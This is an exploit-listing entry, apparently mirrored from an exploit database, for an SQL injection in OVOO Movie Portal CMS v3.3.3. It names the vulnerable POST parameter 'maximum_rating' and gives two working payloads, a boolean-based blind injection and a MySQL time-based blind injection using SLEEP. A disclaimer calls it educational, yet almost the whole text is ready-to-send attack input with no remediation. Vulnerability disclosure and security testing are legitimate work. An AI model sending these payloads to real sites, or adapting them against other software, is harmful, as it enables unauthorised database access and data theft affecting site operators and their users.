Ovoo movie portal cms v3.3.3 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-08-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Ovoo movie portal cms v3.3.3 sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Parameter & Payloads ###
Parameter: maximum_rating (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
2238=2238&page=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1